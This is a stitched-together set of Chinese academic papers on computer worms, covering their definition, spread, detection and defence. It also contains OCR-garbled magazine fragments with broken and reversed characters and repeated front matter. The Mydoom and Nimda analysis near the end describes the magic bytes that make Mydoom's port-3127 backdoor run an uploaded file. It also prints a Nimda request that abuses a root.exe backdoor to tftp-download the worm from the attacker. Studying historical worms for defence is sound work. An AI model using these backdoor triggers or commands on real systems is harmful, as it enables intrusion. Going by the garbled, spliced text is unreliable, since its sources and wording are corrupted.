中国地质大学长城学院结课论文题目蠕虫病毒的分析与防范系别信息工程学院学生姓名段嘉豪专业计算机科学与技术学号041130108指导教师赵培昆2016 年 5 月9 日蠕虫病毒的分析与防范摘要随着网络技术的发展,蠕虫病毒不断扩大对网络安全构成了严重的威胁,本文基于当前蠕虫攻击破坏的严峻形势,对蠕虫病毒的检测和防御技术进行了研究。
首先对蠕虫病毒相关知识作了介绍,包括蠕虫病毒的定义、工作流程以及行为特征,并简要分析了蠕虫病毒国内外研究现状;在此基础上接着研究了蠕虫病毒检测技术,提出了基于蠕虫特征码、蠕虫行为特征、蜜罐和蜜网技术以及贝叶斯蠕虫检测技术;最后对蠕虫病毒的防御技术进行了研究,从企业网络用户和个人用户的角度分析了面对当前蠕虫攻击所需要注意和采取的措施,以尽最大可能减少蠕虫的侵害,营造一个良好的网络环境。
关键词:蠕虫病毒;检测;防御;网络安全ABSTRACTWith the development of network technology, the worm expanding constitutes a serious threat to the network security, this paper based on the grim situation the worm attack damage, the worm detection and defense technology were studied. F irst, an introduction of worm related knowledge, including the worm virus definiti on, working process and behavior characteristics, and a brief analysis of the worm virus research status at home and abroad; on the basis of this, then the worm vi rus detection technology, and puts forward the worm character codes, worm behav ior characteristics, honey and honey net technology and Bayesian worm detection t echnology based on. Finally the worm defense technology were studied from the enterprise network users and individual users of the angle analysis in the face of the worm attack needed to pay attention and take measures, so as to the possible reduction in worm damage, to create a good network environment.Key words: worm; detection; defense; network security目录前言 (1)1、蠕虫病毒相关知识介绍 (2)1.1蠕虫病毒定义 (2)1.2蠕虫病毒工作流程和行为特征 (3)1.3蠕虫病毒国内外研究现状 (4)2、蠕虫病毒检测技术研究 (5)2.1基于蠕虫特征码的检测技术 (5)2.2基于蠕虫行为特征的检测技术 (6)2.3基于蜜罐和蜜网的检测技术 (7)2.4基于贝叶斯的网络蠕虫检测技术 (8)3、蠕虫病毒防御技术研究 (9)3.1企业防范蠕虫病毒措施 (9)3.2个人用户防范蠕虫病毒措施 (10)4、总结 (12)致谢 (13)参考文献 (14)前言随着网络技术的发展,人类社会正逐步进入到数字化时代,计算机已经应用到日常生活各个领域,人们在享受到网络便捷服务的同时,各种安全问题也随之出现。
浅析网络蠕虫及防范措施
浅析网络蠕虫及防范措施一、网络蠕虫定义及特征(一)网络蠕虫的定义网络蠕虫通过网络传播,是一种无须计算机使用者干预即可运行的独立程序。
它通过不停地获得网络中存在漏洞的计算机上的部分或者全部控制权进行传播。
网络蠕虫与普通计算机病毒不同,它不需要人为干预,不利用文件寄生,而且能够自主不断地复制和传播,对网络造成拒绝服务。
蠕虫普通病毒传播形式主动自己传播通过U盘或者受感染的文件存在形式独立存在寄生于某个宿主文件中复制机制自身拷贝插入到宿主程序中传染机制系统或者软件漏洞宿主程序的运行触发传染程序自身计算机使用者攻击目标网络上其他计算机本地文件破坏重点主机自身性能和网络性能本地文件系统搜索机制网络IP扫描本地文件系统扫描防御措施为系统或者软件打补丁从受感染的文件中清除计算机使用者的角色无关病毒传播的关键环节对抗主体计算机使用者,反病毒厂商系统软件,服务软件提供商,网络管理员表格:蠕虫和普通病毒的区别(二)网络蠕虫的特征1、主动传播蠕虫在整一个传播过程中,从搜索漏洞,到利用搜索结果攻击系统,再到复制副本到目标主机,整个过程由蠕虫程序自身主动完成。
2、传播迅速蠕虫的扫描机制决定了蠕虫传播的迅速,一般情况下,蠕虫会打开几十个甚至上百个线程用来同时对外扫描,而且扫描的间隔时间非常短。
再加上蠕虫爆发时用户尚还未对漏洞打补丁,使蠕虫可以在很短的时间内占领整个互联网。
3、利用漏洞计算机系统存在漏洞是蠕虫传播一个必不可少的条件。
早期的蠕虫是科学家用来进行分布式计算的,他们的传播对象是经过许可的计算机。
蠕虫要想不经过允许而进行传播,只有利用搜索到的漏洞进行攻击,提升权限。
4、网络拥塞从蠕虫的传播过程可以看出,在蠕虫的传播过程中,首先要进行扫描,找到存在漏洞的计算机,这是一个大面积的搜索过程,这些都无疑会带来大量的数据流。
特别是蠕虫传播开以后,成千上万台机器在不断地扫描,这是很大的网络开销。
5、反复感染蠕虫是利用计算机系统的漏洞进行传播,如果只是清除了蠕虫在文件系统中留下的痕迹,像清除病毒一样单单地清除蠕虫本身,而没有及时修补系统的漏洞,计算机在重新联网后还有可能会感染这种蠕虫。
蠕虫病毒检测与防范
目录摘要 (2)Abstract (3)第一章蠕虫病毒概述及发展历史 (4)1.1蠕虫病毒概述及发展历史 (4)1.2网络蠕虫研究分析 (5)第二章蠕虫病毒原理 (7)2.1蠕虫病毒攻击原理 (7)2.2蠕虫病毒与一般病毒的异同 (8)第三章蠕虫病毒实例 (10)3.1蠕虫病毒造成的破坏 (10)3.2蠕虫病毒实例 (10)第四章蠕虫病毒的防范 (14)4.1蠕虫的特点及发展趋势 (14)4.2如何对蠕虫病毒攻击进行防范 (14)结束语 (16)致谢 (17)参考文献 (17)摘要随着互联网应用的深入,网络蠕虫对计算机系统安全和网络安全的威胁日益加剧。
特别是在网络环境下,多样化的传播途径和复杂的应用环境使蠕虫的发生频率增加,传播速度更快,覆盖面也更广。
蠕虫病毒侵入计算机网络,可以导致计算机网络的效率急剧下降,系统资源遭到严重破坏,短时间内造成网络系统的瘫痪。
为了将蠕虫病毒对计算机及网络设备、社会经济造成的损失降低到最低限度,提高网络的安全性能,减少不必要的经济损失,保障用户的个人资料及隐私安全,我们将对蠕虫病毒进行检测与防范。
本文主要针对蠕虫病毒的原理与传播、检测与防范等进行研究。
阐述网络安全现状、蠕虫病毒背景及发展历史等,通过蠕虫病毒的原理与传统病毒的区别,功能、工作机制等,对蠕虫病毒对网络安全的威胁,检测与防范做出了相对的研究。
关键词:网络安全;病毒原理;检测;防范AbstractAs the Internet application deeply, network worms to computer system security and network security threats aggravating. Especially in the network environment, diversified transmission way and complicated application environment makes worms the frequency increases, spread faster, coverage is more widely. Worm virus invades computer network, can cause the efficiency of computer network has dropped sharply system resources damaged caused inside short time network system of paralysis. In order to worm virus of computer and network equipment, social economic damage reduced to the minimum, improve the network safety performance and reduce unnecessary economic losses, protect a user's personal data and privacy and security, we will detect worm virus prevention.This article mainly aims at of worm virus principle and propagation, detection and prevention must be studied. Expounds the network security situation, worms background and development history, etc., through the principle of worm virus with traditional viruses distinction, function, working mechanism of worm virus of network security threats, detection and prevention made relative research.Keywords: network security; virus principle; detection; prevent第一章蠕虫病毒概述及发展历史1.1蠕虫病毒概述及发展历史凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。
蠕虫病毒分析及其防范措施浅析
些 特点 和发 展 趋势 。 1 利 用操作 系统 和应 用程 序 的 漏 洞主 动进 行 攻 击 . 1
此 类 病 毒 主要 是 “ 色 代码 ”和 “ 姆 达 ” , 红 尼 以及 至今 依 然肆 虐 的 “ 职信 ”等 。 由于 I 浏 览器 求 E 的漏 洞 ,使 得感 染 了 “ 姆达 ”病 毒 的邮件 在 不去 尼 手工 打开 附 件 的情况 下 病 毒就 能激 活 ,而 此 前 即便
( 1)购合适的杀毒软件
网络蠕虫病毒的发展 已经使传统的杀毒软件的 “ 文
件级实时监控系统”落伍 ,杀毒软件必须 向内存实时监 控和邮件实 时监 控发展 。另外 面对 防不胜 防的 网页病
由于有的病毒邮件能够利用i ul k e 和o t o 的漏洞 自动 o
毒,也使得用户对杀毒软件 的要求越来越高,在杀毒软 件市场上 ,赛门铁克公司的N r n ot 系列杀毒软件在全球具 o 有很大的比例 , 经过多项测试 , r n Not  ̄毒系列软件脚本 o 和蠕虫阻拦技术能够阻挡大部分电子邮件病毒 ,而且对
Sl q 蠕虫王 病毒 则是 利用 了微软 的数 据库 系统 的一个
漏洞进 行大肆攻 击 。
12 .传播 方式 多样
21 用 系统 漏 洞 的 恶性蠕 虫病毒 分 析 .利
在这种病毒 中 ,以红色代码 ,尼姆达和sl q蠕虫为 代表 ,他们共同的特征是利用微软服务器和应用程序组
件的某个漏洞进行攻击 ,由于网上存在这样的漏洞比较
1 病 毒 制作 技 术 . 3
网普及率达七成的韩国所受影响较为严重。韩国两大网络
业l盯及南韩 电讯公司 ,系统都陷入了瘫痪 ,其它的网络 用户也被迫断线,更为严重的是许多银行的自动取款机都 无法正常工作 , 美国许美 国银行统计,该行的100 30 台自 动柜员机 已经无法提供正常提款。网络蠕虫病毒开始对人 们的生活产生了巨大的影响。 ( 下转1 0 ) 页 3
蠕虫病毒的特征与防治
资料范本本资料为word版本,可以直接编辑和打印,感谢您的下载蠕虫病毒的特征与防治地点:__________________时间:__________________说明:本资料适用于约定双方经过谈判,协商而共同承认,共同遵守的责任与义务,仅供参考,文档可直接下载或修改,不需要的部分可直接删除,使用时请详细阅读内容研究生课程论文(2008-2009学年第二学期)蠕虫病毒的特征与防治摘要随着网络的发展,以网络传播的蠕虫病毒利用网络全球互联的优势和计算机系统及网络系统安全性上的漏洞,己经成为计算机系统安全的一大的威胁。
采用网络传播的蠕虫病毒与传统的计算机病毒在很多方面都有许多不同的新特点。
本文对蠕虫病毒的特征和防御策略进行了研究,透彻分析了几个流行的蠕虫病毒的本质特征和传播手段,并提出了防治未知病毒以及变形病毒的解决方案与虚拟机相结合的基于攻击行为的着色判决PN机蠕虫检测方法。
关键词: 蠕虫,病毒特征,病毒防治1引言“蠕虫”这个生物学名词于1982年由Xerox PARC的John F. Shoeh等人最早引入计算机领域,并给出了计算机蠕虫的两个最基本的特征:“可以从一台计算机移动到另一台计算机”和“可以自我复制”。
最初,他们编写蠕虫的目的是做分布式计算的模型试验。
1988年Morris蠕虫爆发后,Eugene H. Spafford为了区分蠕虫和病毒,给出了蠕虫的技术角度的定义。
“计算机蠕虫可以独立运行,并能把自身的一个包含所有功能的版本传播到另外的计算机上。
”计算机蠕虫和计算机病毒都具有传染性和复制功能,这两个主要特性上的一致,导致二者之间是非常难区分的。
近年来,越来越多的病毒采取了蠕虫技术来达到其在网络上迅速感染的目的。
因而,“蠕虫”本身只是“计算机病毒”利用的一种技术手段[1]。
2蠕虫病毒的特征及传播1、一般特征:(1)独立个体,单独运行;(2)大部分利用操作系统和应用程序的漏洞主动进行攻击;(3)传播方式多样;(4)造成网络拥塞,消耗系统资源;(5)制作技术与传统的病毒不同,与黑客技术相结合。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
研究生课程论文蠕虫病毒的特征与防治摘要随着网络的发展,以网络传播的蠕虫病毒利用网络全球互联的优势和计算机系统及网络系统安全性上的漏洞,己经成为计算机系统安全的一大的威胁。
采用网络传播的蠕虫病毒与传统的计算机病毒在很多方面都有许多不同的新特点。
本文对蠕虫病毒的特征和防御策略进行了研究,透彻分析了几个流行的蠕虫病毒的本质特征和传播手段,并提出了防治未知病毒以及变形病毒的解决方案与虚拟机相结合的基于攻击行为的着色判决PN机蠕虫检测方法。
关键词: 蠕虫,病毒特征,病毒防治1引言“蠕虫”这个生物学名词于1982年由Xerox PARC的John F. Shoeh等人最早引入计算机领域,并给出了计算机蠕虫的两个最基本的特征:“可以从一台计算机移动到另一台计算机”和“可以自我复制”。
最初,他们编写蠕虫的目的是做分布式计算的模型试验。
1988年Morris蠕虫爆发后,Eugene H. Spafford为了区分蠕虫和病毒,给出了蠕虫的技术角度的定义。
“计算机蠕虫可以独立运行,并能把自身的一个包含所有功能的版本传播到另外的计算机上。
”计算机蠕虫和计算机病毒都具有传染性和复制功能,这两个主要特性上的一致,导致二者之间是非常难区分的。
近年来,越来越多的病毒采取了蠕虫技术来达到其在网络上迅速感染的目的。
因而,“蠕虫”本身只是“计算机病毒”利用的一种技术手段[1]。
2蠕虫病毒的特征及传播1、一般特征:(1)独立个体,单独运行;(2)大部分利用操作系统和应用程序的漏洞主动进行攻击;(3)传播方式多样;(4)造成网络拥塞,消耗系统资源;(5)制作技术与传统的病毒不同,与黑客技术相结合。
2、病毒与蠕虫的区别(l)存在形式上病毒寄生在某个文件上,而蠕虫是作为独立的个体而存在;(2)传染机制方面病毒利用宿主程序的运行,而蠕虫利用系统存在的漏洞;(3)传染目标病毒针对本地文件,而蠕虫针对网络上的其他计算机;(4)防治病毒是将其从宿主文件中删除,而防治蠕虫是为系统打补丁。
3、传播过程:(1)扫描:由蠕虫的扫描功能模块负责探测存在漏洞的主机。
(2)攻击:攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象,取得该主机的权限(一般为管理员权限),获得一个shell。
(3)现场处理:进入被感染的系统后,要做现场处理工作,现场处理部分工作主要包括隐藏、信息搜集等等(4)复制:复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。
每一个具体的蠕虫在实现这四个部分时会有不同的侧重,有的部分实现的相当复杂,有的部分实现的则相当简略。
尼姆达病毒是一个比较典型的病毒与蠕虫技术相结合的蠕虫病毒,它几乎包括目前所有流行病毒的传播手段,并且可以攻击Win98/NT/2000/XP等所有的Windows操作平台。
该病毒有以下4种传播方式: (1)通过Email发送在客户端看不到的邮件附件程序sample.exe,该部分利用了微软的OE信件浏览器的漏洞;(2)通过网络共享的方式来传染给局域网络上的网络邻居,使用设置密码的共享方式可以有效的防止该病毒的此种传播方式;(3)通过没有补丁的IIS服务器来传播,该传播往往是病毒屡杀不绝的原因,该方式利用了微软IIS的UNICODE漏洞;(4)通过感染普通的文件来传播,在这一点上和普通的病毒程序相同。
4、蠕虫病毒的传播趋势目前的流行病毒越来越表现出以下三种传播趋势:1、通过邮件附件传播病毒,如Mydoom等邮件病毒;2、通过无口令或者弱口令共享传播病毒,如Nimda、Netskey等;3、利用操作系统或者应用系统漏洞传播病毒,如冲击波蠕虫、震荡波蠕虫等。
3目前流行的蠕虫病毒3.1 Mydoom邮件病毒Novarg/Mydoom.a蠕虫是2004年1月28日开始传入我国的一个通过邮件传播的蠕虫。
在全球所造成的直接经济损失至少达400亿美元,是2004年1月份十大病毒之首。
该蠕虫利用欺骗性的邮件主题和内容来诱使用户运行邮件中的附件。
拒绝服务的方式是向网站的WEB服务发送大量GET请求,在传播和攻击过程中,会占用大量系统资源,导致系统运行变慢。
蠕虫还会在系统上留下后门,通过该后门,入侵者可以完全控制被感染的主机[2]。
该蠕虫没有使用特别的技术和系统漏洞,之所以能造成如此大的危害,主要还是由于人们防范意识的薄弱,和蠕虫本身传播速度较快的缘故。
该蠕虫主要通过电子邮件进行传播,它的邮件主题、正文和所带附件的文件名都是随机的,另外它还会利用Kazaa的共享网络来进行传播。
病毒文件的图标和windows系统记事本(NOTEPAD.EXE)图标非常相似,运行后会打开记事本程序,显示一些乱码信息,其实病毒已经开始运行了。
病毒会创建名为“SwebSipcSmtxSO”的排斥体来判断系统是否己经被感染。
蠕虫在系统中寻找所有可能包含邮件地址的文件,包括地址簿文件、各种网页文件等,从中提取邮件地址,作为发送的目标。
病毒会避免包含以下信息的域名:gov、mil、borlan、bsd、example等,病毒同样会避免包含以下信息的电子邮件帐户:accoun、ca、certific、、icrosoft、info、linux等,当病毒检测到邮件地址中含有上述域名或帐户时则忽略该地址,不将其加入到发送地址链表中。
Worm.Mydoom.a病毒主程序流程如图3-1所示,后门程序shimgapi.dll如图3-2所示:图3-1 Mydoom病毒主体流程图图3-2 shimgapi.dll流程图Mydoom蠕虫病毒除造成了网络资源的浪费,阻塞网络,被攻击网站不能提供正常服务外,最大的危险在于安装了后门程序。
该后门即shimgapi.dll,通过修改注册表,使自身随着EXPLORER的启动而运行,将自己加载到了资源管理器的进程空间中。
后门监听3127端口,如果该端口被占用,则递增,但不大于3198。
后门提供了两个功能:(1)作为端口转发代理;(2)作为后门,接收上传程序并执行。
当3127端口收到连接之后,如果recv的第一个字符是x04,转入端口转发流程。
若第二个字符是0x01,则取3、4两个字符作为目标端口,取第5-8四个字节作为目标IP地址,进行连接并和当前socket数据转发。
recv的第一个字符如果是x85,则转入执行命令流程。
先接收四个字节,转成主机字节序后验证是否是x133c9ea2,验证通过则创建临时文件接收数据,接收完毕运行该文件。
也就是说,只要我们把任意一个可执行文件的头部,加上五个字符:x85133c9ea2,作为数据发送到感染了Mydoom.a蠕虫机器的3127端口,这个文件,就会在系统上被执行,从而对被感染系统的安全造成了极大的威胁。
Nimda蠕虫病毒在Nimda蠕虫病毒出现以前,“蠕虫”技术一直是独立发展的。
Nmida病毒第一次将“蠕虫”技术和“计算机病毒”技术结合起来。
从Nimda的攻击方式来看,Nimda蠕虫病毒只攻击微软的Win X系列操作系统,它通过电子邮件、网络临近共享文件、IE浏览器的内嵌MIME类型自动执行漏洞、IIS服务器文件目录遍历漏洞、Code Red II和Sad mind/IIS蠕虫留下的后门共五种方式进行传播,其中前三种方式是病毒传播方式。
关于蠕虫病毒的分析,在很多文献[3]中都有提到,本文在这些文献的基础上,重点针对几种典型的蠕虫病毒在技术实现上的特点进行分析,以期找到他们的一些共性。
1.被利用的系统漏洞描述(1)微软IE异常处理MIME头漏洞IE在处理MIME头中“Content2Type:”处指定的某些类型时存在问题,攻击者可以利用这类缺陷在IE客户端执行任意命令。
(2)Microsoft IIS UniCode解码目录遍历漏洞微软IIS4.0和IIS5.0在UniCdoe字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。
(3)Microsoft IIS CGI文件名错误解码漏洞微软IIS4.0/5.0在处理CGI程序文件名时存在一个安全漏洞,由于错误地对文件名进行了两次解码,攻击者可能利用这个漏洞执行任意系统命令。
(4)“Code Red II”和Sadmind/IIS蠕虫留下的后门程序。
2.传播方式(l)邮件传播蠕虫会向被攻击者发送一封携带了蠕虫附件的邮件。
这个邮件由两部分MIME类型的信息组成:第一部分的MIME类型为“text/html”,但却没有包含文本,因此看起来是空的;第二部分的MIME类型为“a udio/x2wav”,但它实际上携带的是一个名为“Readme.exe”的base64编码的可执行附件。
利用了“微软IE异常处理MIME头漏洞”安全漏洞,任何运行在x86平台下并且使用微软IE5.5SP1或之前版本(IE5.01SP2除外)来显示HTML邮件的邮件客户端软件,都将自动执行邮件附件。
用户甚至只需打开或预览邮件即可使蠕虫被执行[4]。
被蠕虫攻击的目标邮件的地址从下列两个来源中获得:①用户Web Cache文件夹中的*.htm和*.html文件②用户通过MAPI服务收到Email邮件的内容蠕虫在这些文件中搜索看起来像邮件地址的字符串,然后向这些地址发送一份包含蠕虫拷贝的邮件。
Nimda蠕虫在Windows注册表中记录最后一批邮件发送的时间,然后每十天重复搜索邮件地址并重新发送蠕虫邮件。
(2)IIS WEB服务器传播蠕虫会利用两个IIS服务器的目录遍历漏洞和以前的一些IIS蠕虫(Rde CodeII和Sad mind/IIS)留下的后门程序来进行传播。
蠕虫按照下列几率来选择攻击目标的IP地址:①50%的几率,在与本地IP地址前两字节相同的地址(B类网络)中选择一个②25%的几率,在与本地IP地址前一字节相同的地址(A类网络)中选择一个③25%的几率,随机选择IP地址。
蠕虫首先会启动一个TFTP服务器,监听UDP/69端口。
在开启TFTP服务器和确定攻击P1地址之后,Nimda就开始对这个IP地址进行扫描。
首先,扫描“RdeCodeII”留下的后门。
由于被“RedCodeII”攻击过的系统中的Web虚拟目录中会留下一个名为Root.exe的后门程序,Nimda就首先扫描“/Scripts/root.exe”,如果这个程序存在的话,Nimda蠕虫就企图通过它在系统上执行命令。
它执行类似下列命令来向其发送蠕虫代码:GET/scripts/root.exe?/c+tftp+2i+localip+GET+Admin.dll HTTP/1.0其中Localip是本主机的IP地址,这样就通过TFTP协议将本地的Admin.dll文件传播过去,而这个Admin.dll实际上就是蠕虫代码本身,只不过它在这里是以*.dll文件的形式存在。